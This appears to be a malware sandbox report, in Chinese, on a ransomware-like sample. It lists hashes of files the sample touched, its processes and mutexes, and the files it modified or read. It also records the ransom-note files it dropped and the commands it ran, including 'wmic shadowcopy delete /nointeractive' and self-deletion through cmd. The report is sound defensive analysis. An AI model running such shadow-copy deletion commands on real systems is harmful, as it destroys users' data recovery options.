9966eade3cd752d5569481
Ssdeep
24:Gwf+ueTZ425OQXXjrZ206obIyUoOIViDkZ1SqHtz+t9TqNCg:GTvTSMTTQ0AkOIek22z2RICg
Yara
无匹配
VirusTotal
搜索相关分析
chrome.py
文件名
相关文件
chrome.py
C:\gvszdsz\modules\packages\chrome.py
文件大小
960 bytes
文件类型
data
MD5
4c0f9deb83c5e46fae234d110e2ff94d
SHA1
00f72e54cc06330ac030d860cc87f866aa2f912d
SHA256
defa64377822f9197caf774d3f4e3b1bc1c3a2601fc597d8f1754f2c618b4b53
SHA512
e614f63a959ebdc9116e0aa7472acf5dc9f088e594ac2304cb2a0f05e963d7f056222628e3e30e79d06f9df38facbb8387405d41f
ef548c084284e96f59e7678
Ssdeep
12:GwU0vWA5etxozmwJjDpMn41d3MLKdLI6+XDF7aNsCsM/KSUlX3f9qss/qb8oavVJ:Gwf+ueTZ424rkiUFeNseyd9qF/Hzz
Yara
无匹配
VirusTotal
搜索相关分析
generic.py
文件名
相关文件
generic.py
C:\gvszdsz\modules\packages\generic.py
文件大小
1008 bytes
文件类型
data
MD5
18d19751860a11c849c87efcd5d58334
SHA1
df50893dfc4b07ba1760773e885084cb638b7757
SHA256
846176d348b261d4f5185ffdaaceedd9bb796325ae0523babeaeefd6f0a32d86
SHA512
20873889c6da9c24890eef7f7885de0c6a4ff9a883c7e922855c6516754de7a7ce13f97f49545ae89ed0367130ff99e382733fcf0
1d951d8d42469f06a2cf59c
Ssdeep
12:GwU0vWA5etxozmwJjDpMnEx5WQXXjH4ZLiWV/4feyL1bNTTwOHDP/2oRBqUkhuPr:Gwf+ueTZ42EOQXXj0LiBGSNZzeoR7Pr
Yara
无匹配
VirusTotal
搜索相关分析
browser.py
文件名
相关文件
browser.py
C:\gvszdsz\modules\auxiliary\browser.py
文件大小
1712 bytes
文件类型
data
MD5
2068d9d5ace44a3d83f65eeec93e7d40
SHA1
4fb161edb37ab09a3d9a30d1364704084e12e849
SHA256
8b083a210e967ac10045d08e02d39ae612f2c64f5460223ca966a861bd861ee3
SHA512
d91a2e10d24b378f529e889636383eeedad1713284df5b610d7f0d3c2c6ca728738f377dd60dfee104b258a29188fc8090255c6
8ded69bb98d6c81ada62b12df
Ssdeep
24:Gwf+ueTZ42vC0n9u+2JVc3U7+Dkq9zgilt+i0K3xfNEH85X6TajNRcSXq8VicoIN:GTvTSV0fEKYQH10K3ZNV6uJeAjLR
Yara
无匹配
VirusTotal
搜索相关分析
digisig.py
文件名
相关文件
digisig.py
C:\gvszdsz\modules\auxiliary\digisig.py
文件大小
6960 bytes
文件类型
data
MD5
7fdabbd2488dc310b898e50156b29bf7
SHA1
fa98d2effe3b4a199324324d42ca0e472fa7d53b
SHA256
ee52ef9df5acfbdaa74d530a8699bf616a9d8def5d30e92516f2efe93f46d826
SHA512
13c82719de361201d8e9516a88524d9d1b8c578f38643fde4f0293b4b1beaa19e0668cb630188d4f3db4fd0c2321bb6c84025ab
54c4a8e481aa0fc28d8f5ce79
Ssdeep
192:vVKzLFF4bIcyE7u2ZN2ndCh7LCuKH2yWpagaPBgus:eF6bInqPZN8C9LCuKH2za5gus
Yara
无匹配
VirusTotal
搜索相关分析
screenshots.py
文件名
相关文件
screenshots.py
C:\gvszdsz\modules\auxiliary\screenshots.py
文件大小
2464 bytes
文件类型
data
MD5
962203d6cc74d813d2e1dfcd0334ec67
SHA1
2c97f9d0e7ccff8c187fd76e718b3cfb78dcebf0
SHA256
ec7f3ac29ed4f1a546c6105e5d0ad3e6c37273da336f8354cac72e5af7c26059
SHA512
4ddb6185cce070be705eefad45976b04b923fc74db65f90d09902f00cff3a8f8f9be0f263c63f7237ec08b14704f3d9e5c3f5a8d61
9f0be5443bb8bb643154a0
Ssdeep
48:GTvTSa6TTyoSUH9WyBKhcSr6/NbAZoQ1t14tSnB:GTTAej49ihcSoNdQ1x
Yara
无匹配
VirusTotal
搜索相关分析
js.py
文件名
相关文件
js.py
C:\gvszdsz\modules\packages\js.py
文件大小
896 bytes
文件类型
data
MD5
4df8a4c1998863cb398cedc22d0f9eaa
SHA1
325173ad7f36a2990217c9727be5327632468863
SHA256
9db4e0cd6b56657434e064ba0b59f5ea4ad3e6b0107ac2ae8f70310ce4ccee3f
SHA512
4af92500dcfd0e680470624ec2743edac12bea78ac00acc5c6ecdfbcd0ee5e62141cd7603f3384d91470d7f6a0130985d75265b
52b88f93edad64cb9733658f5
Ssdeep
12:GwU0vWA5etxozmwJjDpMn20qq9uK5mZMTV7ALsdKpQydlQSrdnQxNsmAMUSjrj:Gwf+ueTZ4220n9usmZMTlL+llrZoPOUj
Yara
无匹配
VirusTotal
搜索相关分析
vbs.py
文件名
相关文件
vbs.py
C:\gvszdsz\modules\packages\vbs.py
文件大小
1296 bytes
文件类型
data
MD5
df53acc9713a96488559d2b1f0b18d57
SHA1
5c4110ff94347e0e37bc28065df0bd4efa833f31
SHA256
2e8aa29719cae7e309129e4bed26056d740bbab0b88e5f241f5edf4efebae606
SHA512
4d243738e4206f00cbc674ab08cda6a1a8765729415dabccf7f7daa3819dcb78e0f692e2eecdd2a1776026b899a3b815ac0bcc5
8e46779f145784138f1d94dcf
Ssdeep
24:Gwf+ueTZ42teOQXXjrbdV+b1v18WMOFdfeQkysdvqWun/U7g:GTvTSNTTndo1v1KOFdfeNX/g
Yara
无匹配
VirusTotal
搜索相关分析
rar.py
文件名
相关文件
rar.py
C:\gvszdsz\modules\packages\rar.py
文件大小
5152 bytes
文件类型
data
MD5
2a149ec16a4bfe6000a73da8204c9812
SHA1
6085a1c474080a94f2215ed618af0abc6960c2cc
SHA256
d14de206a3980fd1378dd1dc6d327c622b5e901fcdca5ecb99f449bc200d9b1b
SHA512
8bb2b9c445217ce954651dee0e7ea9d0843276809e3633ba7cbc9073087ec2ba4d1d2fc072387c8f73daf6c52e3a039c9d4d50
57466a75b0f90275376ae82e5b
Ssdeep
96:GTT1Nf2v2YYuDn2S0qbjoQ9wGpYCnDNG/DAjn+J3Br8:iS6wzrnSQDNGCn+J3m
Yara
无匹配
VirusTotal
搜索相关分析
log.py
文件名
相关文件
log.py
C:\gvszdsz\lib\core\log.py
文件大小
4624 bytes
文件类型
data
MD5
68145b3b52887f553b226e62f207aa44
SHA1
4fae9b5357a0d6a296c0c3c77a3bc0f3c33897a5
SHA256
31230384d4cbe586f969b501c3e07e37bde58484f0fc0d956d14f024a293cc61
SHA512
c7e286cc7281092e1395882553fa2ec21dd336fc22ea9aef5cd0269624aa0bea8eb7a4139c56247d0206a0383b12fb4fbd09df8
686bdf7f7c88a4627a13c4d83
Ssdeep
96:GT3x1uDPAG5xf705CkAMXBQ2Iiy+pUVrmndhHaUbIhCtYhv:+xEjAaxf7SCQBYicmnLHaKIhCtM
Yara
无匹配
VirusTotal
搜索相关分析
行为分析
互斥量(Mutexes)
__wqrsdwetrwetlkgsdv
Local\ZoneAttributeCacheCounterMutex
Local\ZonesCacheCounterMutex
Local\ZonesLockedCacheCounterMutex
IESQMMUTEX_0_208
执行的命令
C:\Users\test\AppData\Roaming\wsmprovhost.exe
"C:\Windows\system32\cmd.exe" /c DEL C:\Users\test\AppData\Local\Temp\4618~1.VIR >> NUL
C:\Windows\System32\cmd.exe /c DEL C:\Users\test\AppData\Local\Temp\4618~1.VIR >> NUL
"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive
wmic.exe shadowcopy delete /nointeractive
创建的服务 无信息
启动的服务 无信息
进程
46.18.vir
PID: 1184, 上一级进程 PID: 1240
wsmprovhost.exe
cmd.exe
PID: 2708, 上一级进程 PID: 1184
PID: 2416, 上一级进程 PID: 1184
WMIC.exe
PID: 2748, 上一级进程 PID: 2708
访问的文件
C:\Users\test\AppData\Local\Temp\46.18.vir.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\test\AppData\Local\Temp\46.18.vir:Zone.Identifier
C:\Users\test\AppData\Roaming\46.18.vir
C:\Users\test\AppData\Local\Temp\46.18.vir
C:\Users\test\AppData\Roaming\wsmprovhost.exe
C:\Windows\System32\rsaenh.dll
\??\MountPointManager
C:\Windows\System32\cmd.exe
C:\Users\test\AppData\Roaming\wsmprovhost.exe.Local\
C:\Users\test\AppData\Roaming\wsmprovhost.exe:Zone.Identifier
C:\Users\test\Documents\storage_data
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\ieframe.dll
C:\Users\test\AppData\Local\Temp\wmic.exe
C:\Windows\sysnative\wmic.exe
C:\Windows\system\wmic.exe
C:\Windows\wmic.exe
C:\Windows\sysnative\wbem\WMIC.exe
C:\
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\wbem
C:\Users\test\AppData\Local\Microsoft\Windows\Caches
C:\Users\test\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\test\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db
C:\Users\test\Desktop\desktop.ini
C:\Windows\SysWOW64\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Windows\sysnative\wbem\WMIC.exe:Zone.Identifier
C:\Users\test\Documents\+recover+file.txt
C:\Windows\Fonts\staticcache.dat
C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk
C:\Windows\System32\ras\*.pbk
C:\Users\test\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk
C:\Users\test\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk
\Device\Afd\Endpoint
\Device\RasAcd
C:\\*.*
C:\$Recycle.Bin\*.*
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\*.*
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Htm
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Htm
C:\agent\*.*
C:\agent\agent.py
C:\agent\{RecOveR}-xbdeb__.Png
C:\agent\{RecOveR}-xbdeb__.Txt
C:\agent\{RecOveR}-xbdeb__.Htm
C:\Documents and Settings\*.*
C:\Documents and Settings\{RecOveR}-xbdeb__.Png
C:\Documents and Settings\{RecOveR}-xbdeb__.Txt
C:\Documents and Settings\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\*.*
C:\gvszdsz\analyzer.py
C:\gvszdsz\bin\*.*
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Png
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\dll\*.*
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Png
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\*.*
C:\gvszdsz\lib\api\*.*
C:\gvszdsz\lib\api\process.py
C:\gvszdsz\lib\api\screenshot.py
C:\gvszdsz\lib\api\utils.py
C:\gvszdsz\lib\api\__init__.py
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\common\*.*
C:\gvszdsz\lib\common\abstracts.py
C:\gvszdsz\lib\common\constants.py
C:\gvszdsz\lib\common\defines.py
C:\gvszdsz\lib\common\errors.py
C:\gvszdsz\lib\common\exceptions.py
C:\gvszdsz\lib\common\hashing.py
C:\gvszdsz\lib\common\rand.py
C:\gvszdsz\lib\common\results.py
C:\gvszdsz\lib\common\__init__.py
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\core\*.*
C:\gvszdsz\lib\core\config.py
C:\gvszdsz\lib\core\log.py
C:\gvszdsz\lib\core\packages.py
C:\gvszdsz\lib\core\privileges.py
C:\gvszdsz\lib\core\startup.py
C:\gvszdsz\lib\core\__init__.py
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\__init__.py
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\*.*
C:\gvszdsz\modules\auxiliary\*.*
C:\gvszdsz\modules\auxiliary\browser.py
C:\gvszdsz\modules\auxiliary\digisig.py
C:\gvszdsz\modules\auxiliary\disguise.py
C:\gvszdsz\modules\auxiliary\human.py
C:\gvszdsz\modules\auxiliary\screenshots.py
C:\gvszdsz\modules\auxiliary\__init__.py
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\packages\*.*
C:\gvszdsz\modules\packages\applet.py
C:\gvszdsz\modules\packages\bin.py
C:\gvszdsz\modules\packages\chrome.py
C:\gvszdsz\modules\packages\cpl.py
C:\gvszdsz\modules\packages\dll.py
C:\gvszdsz\modules\packages\doc.py
C:\gvszdsz\modules\packages\eml.py
C:\gvszdsz\modules\packages\exe.py
C:\gvszdsz\modules\packages\firefox.py
C:\gvszdsz\modules\packages\generic.py
C:\gvszdsz\modules\packages\html.py
C:\gvszdsz\modules\packages\ie.py
C:\gvszdsz\modules\packages\jar.py
C:\gvszdsz\modules\packages\js.py
C:\gvszdsz\modules\packages\msg.py
C:\gvszdsz\modules\packages\msi.py
C:\gvszdsz\modules\packages\pdf.py
C:\gvszdsz\modules\packages\ppt.py
C:\gvszdsz\modules\packages\ps1.py
C:\gvszdsz\modules\packages\python.py
C:\gvszdsz\modules\packages\rar.py
C:\gvszdsz\modules\packages\regsvr.py
C:\gvszdsz\modules\packages\swf.py
C:\gvszdsz\modules\packages\vbs.py
C:\gvszdsz\modules\packages\xls.py
C:\gvszdsz\modules\packages\zip.py
C:\gvszdsz\modules\packages\__init__.py
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\__init__.py
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\{RecOveR}-xbdeb__.Png
C:\gvszdsz\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\{RecOveR}-xbdeb__.Htm
C:\MSOCache\*.*
C:\MSOCache\All Users\*.*
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\*.*
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\*.*
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\*.*
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\*.*
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\Users\test\AppData\Local\Temp
C:\Users
C:\Users\test
C:\Users\test\AppData
C:\Users\test\AppData\Local
\??\NUL
C:\Windows\sysnative\wbem\XSL-Mappings.xml
C:\Windows\sysnative\wbem\
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
C:\Windows\sysnative\wbem\WMIC.exe.Local\
C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c
C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\msvcr90.dll
C:\Windows\
C:\Windows\winsxs
C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\
读取的文件
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\test\AppData\Roaming\46.18.vir
C:\Users\test\AppData\Local\Temp\46.18.vir
C:\Windows\System32\rsaenh.dll
C:\Users\test\AppData\Roaming\wsmprovhost.exe
C:\Users\test\Documents\storage_data
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Windows\SysWOW64\shell32.dll
C:\Windows\SysWOW64\ieframe.dll
C:\
C:\Windows
C:\Windows\sysnative
C:\Windows\sysnative\wbem
C:\Users\test\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\test\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000003.db
C:\Users\test\Desktop\desktop.ini
C:\Windows\Fonts\staticcache.dat
\Device\Afd\Endpoint
\Device\RasAcd
C:\agent\agent.py
C:\gvszdsz\analyzer.py
C:\gvszdsz\lib\api\process.py
C:\gvszdsz\lib\api\screenshot.py
C:\gvszdsz\lib\api\utils.py
C:\gvszdsz\lib\api\__init__.py
C:\gvszdsz\lib\common\abstracts.py
C:\gvszdsz\lib\common\constants.py
C:\gvszdsz\lib\common\defines.py
C:\gvszdsz\lib\common\errors.py
C:\gvszdsz\lib\common\exceptions.py
C:\gvszdsz\lib\common\hashing.py
C:\gvszdsz\lib\common\rand.py
C:\gvszdsz\lib\common\results.py
C:\gvszdsz\lib\common\__init__.py
C:\gvszdsz\lib\core\config.py
C:\gvszdsz\lib\core\log.py
C:\gvszdsz\lib\core\packages.py
C:\gvszdsz\lib\core\privileges.py
C:\gvszdsz\lib\core\startup.py
C:\gvszdsz\lib\core\__init__.py
C:\gvszdsz\lib\__init__.py
C:\gvszdsz\modules\auxiliary\browser.py
C:\gvszdsz\modules\auxiliary\digisig.py
C:\gvszdsz\modules\auxiliary\disguise.py
C:\gvszdsz\modules\auxiliary\human.py
C:\gvszdsz\modules\auxiliary\screenshots.py
C:\gvszdsz\modules\auxiliary\__init__.py
C:\gvszdsz\modules\packages\applet.py
C:\gvszdsz\modules\packages\bin.py
C:\gvszdsz\modules\packages\chrome.py
C:\gvszdsz\modules\packages\cpl.py
C:\gvszdsz\modules\packages\dll.py
C:\gvszdsz\modules\packages\doc.py
C:\gvszdsz\modules\packages\eml.py
C:\gvszdsz\modules\packages\exe.py
C:\gvszdsz\modules\packages\firefox.py
C:\gvszdsz\modules\packages\generic.py
C:\gvszdsz\modules\packages\html.py
C:\gvszdsz\modules\packages\ie.py
C:\gvszdsz\modules\packages\jar.py
C:\gvszdsz\modules\packages\js.py
C:\gvszdsz\modules\packages\msg.py
C:\gvszdsz\modules\packages\msi.py
C:\gvszdsz\modules\packages\pdf.py
C:\gvszdsz\modules\packages\ppt.py
C:\gvszdsz\modules\packages\ps1.py
C:\gvszdsz\modules\packages\python.py
C:\gvszdsz\modules\packages\rar.py
C:\gvszdsz\modules\packages\regsvr.py
C:\gvszdsz\modules\packages\swf.py
C:\gvszdsz\modules\packages\vbs.py
C:\gvszdsz\modules\packages\xls.py
C:\gvszdsz\modules\packages\zip.py
C:\gvszdsz\modules\packages\__init__.py
C:\gvszdsz\modules\__init__.py
\??\NUL
C:\Windows\sysnative\wbem\
C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\msvcr90.dll
C:\Windows\
C:\Windows\winsxs\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\
C:\Windows\sysnative\wbem\XSL-Mappings.xml
修改的文件
C:\Users\test\AppData\Roaming\wsmprovhost.exe
\??\PIPE\wkssvc
\??\PIPE\srvsvc
C:\Users\test\Documents\storage_data
C:\Users\test\Documents\+recover+file.txt
\Device\Afd\Endpoint
\Device\RasAcd
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\S-1-5-21-2280033686-3172497658-3481507381-1000\{RecOveR}-xbdeb__.Htm
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Png
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Txt
C:\$Recycle.Bin\{RecOveR}-xbdeb__.Htm
C:\agent\agent.py
C:\agent\{RecOveR}-xbdeb__.Png
C:\agent\{RecOveR}-xbdeb__.Txt
C:\agent\{RecOveR}-xbdeb__.Htm
C:\Documents and Settings\{RecOveR}-xbdeb__.Png
C:\Documents and Settings\{RecOveR}-xbdeb__.Txt
C:\Documents and Settings\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\analyzer.py
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Png
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\bin\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Png
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\dll\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\api\process.py
C:\gvszdsz\lib\api\screenshot.py
C:\gvszdsz\lib\api\utils.py
C:\gvszdsz\lib\api\__init__.py
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\api\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\common\abstracts.py
C:\gvszdsz\lib\common\constants.py
C:\gvszdsz\lib\common\defines.py
C:\gvszdsz\lib\common\errors.py
C:\gvszdsz\lib\common\exceptions.py
C:\gvszdsz\lib\common\hashing.py
C:\gvszdsz\lib\common\rand.py
C:\gvszdsz\lib\common\results.py
C:\gvszdsz\lib\common\__init__.py
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\common\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\core\config.py
C:\gvszdsz\lib\core\log.py
C:\gvszdsz\lib\core\packages.py
C:\gvszdsz\lib\core\privileges.py
C:\gvszdsz\lib\core\startup.py
C:\gvszdsz\lib\core\__init__.py
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\core\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\lib\__init__.py
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Png
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\lib\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\auxiliary\browser.py
C:\gvszdsz\modules\auxiliary\digisig.py
C:\gvszdsz\modules\auxiliary\disguise.py
C:\gvszdsz\modules\auxiliary\human.py
C:\gvszdsz\modules\auxiliary\screenshots.py
C:\gvszdsz\modules\auxiliary\__init__.py
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\auxiliary\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\packages\applet.py
C:\gvszdsz\modules\packages\bin.py
C:\gvszdsz\modules\packages\chrome.py
C:\gvszdsz\modules\packages\cpl.py
C:\gvszdsz\modules\packages\dll.py
C:\gvszdsz\modules\packages\doc.py
C:\gvszdsz\modules\packages\eml.py
C:\gvszdsz\modules\packages\exe.py
C:\gvszdsz\modules\packages\firefox.py
C:\gvszdsz\modules\packages\generic.py
C:\gvszdsz\modules\packages\html.py
C:\gvszdsz\modules\packages\ie.py
C:\gvszdsz\modules\packages\jar.py
C:\gvszdsz\modules\packages\js.py
C:\gvszdsz\modules\packages\msg.py
C:\gvszdsz\modules\packages\msi.py
C:\gvszdsz\modules\packages\pdf.py
C:\gvszdsz\modules\packages\ppt.py
C:\gvszdsz\modules\packages\ps1.py
C:\gvszdsz\modules\packages\python.py
C:\gvszdsz\modules\packages\rar.py
C:\gvszdsz\modules\packages\regsvr.py
C:\gvszdsz\modules\packages\swf.py
C:\gvszdsz\modules\packages\vbs.py
C:\gvszdsz\modules\packages\xls.py
C:\gvszdsz\modules\packages\zip.py
C:\gvszdsz\modules\packages\__init__.py
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\packages\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\modules\__init__.py
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Png
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\modules\{RecOveR}-xbdeb__.Htm
C:\gvszdsz\{RecOveR}-xbdeb__.Png
C:\gvszdsz\{RecOveR}-xbdeb__.Txt
C:\gvszdsz\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0015-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
C:\MSOCache\All Users\{90140000-0016-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Htm
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Png
C:\MSOCache\All Users\{90140000-0018-0804-0000-0000000FF1CE}-C\{RecOveR}-xbdeb__.Txt
\??\NUL
删除的文件
C:\Users\test\AppData\Local\Temp\46.18.vir:Zone.Identifier
C:\Users\test\AppData\Roaming\wsmprovhost.exe:Zone.Identifier
注册表键
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\PageAllocatorUseSystemHeap
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\PageAllocatorSystemHeapIsPrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\Tracing
HKEY_CURRENT_USER\Software\Microsoft\DirectShow\PushClock
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\46.18.vir
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
